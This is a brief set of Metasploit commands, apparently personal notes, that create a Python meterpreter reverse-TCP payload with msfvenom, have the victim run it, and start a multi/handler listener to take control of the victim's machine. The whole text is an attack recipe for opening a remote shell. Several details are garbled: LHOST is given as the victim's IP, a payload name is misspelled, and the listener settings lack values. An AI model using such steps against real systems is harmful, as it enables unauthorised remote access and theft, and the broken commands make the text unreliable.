Msfvenom —payload=python/meterpreter/reverse_tcp LHOST=VICTIMS_IP LPORT=4444 —out=meterpreter.py
To run the payload at victims side
python meterpreter.py
>use exploit/multi/handler
Enter
>set PAYLOAD python/metepreter/reverse_tcp
Enter
>set LHOST
Enter
>set LPORT
Enter
>exploit
To run and access the system